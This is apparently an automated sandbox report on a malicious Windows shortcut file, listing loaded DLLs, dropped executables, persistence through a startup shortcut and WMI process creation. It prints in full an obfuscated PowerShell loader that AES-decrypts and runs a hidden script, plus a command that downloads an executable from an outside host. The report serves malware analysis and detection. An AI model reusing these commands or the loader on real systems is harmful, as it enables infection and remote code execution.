Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: n5Szx8qsFB.lnkLNK file: ..\..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764422929.0000021D206C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764242109.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763193876.0000021D2464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763663634.0000021D24632000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762308911.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D246C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D24652000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763886260.0000021D26241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)Jump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: ghep2412_2[1].6.drStatic PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC06D64 LoadLibraryA,GetProcAddress,15_2_00007FF7ADC06D64
Source: ghep2412_2[1].6.drStatic PE information: real checksum: 0x20826 should be: 0x72559
Source: ghep2412_2[1].6.drStatic PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B3E00BD pushad ; iretd 5_2_00007FFB4B3E00C1
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC378FD push rdi; ret 15_2_00007FF7ADC37904
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC37399 push rdi; ret 15_2_00007FF7ADC373A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFB49AA1C65 push edi; iretd 21_2_00007FFB49AA1C93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFB49AA1C0C push edi; iretd 21_2_00007FFB49AA1C93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFB49AA23E1 pushad ; retf 21_2_00007FFB49AA23F1
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B78B75 push ecx; ret 23_2_00B78B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00818B75 push ecx; ret 27_2_00818B88

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XKIZdXAs.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]Jump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC24514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00007FF7ADC24514
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BD59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_00BD59B3
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B65EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_00B65EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_008759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_008759B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00805EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_00805EDA
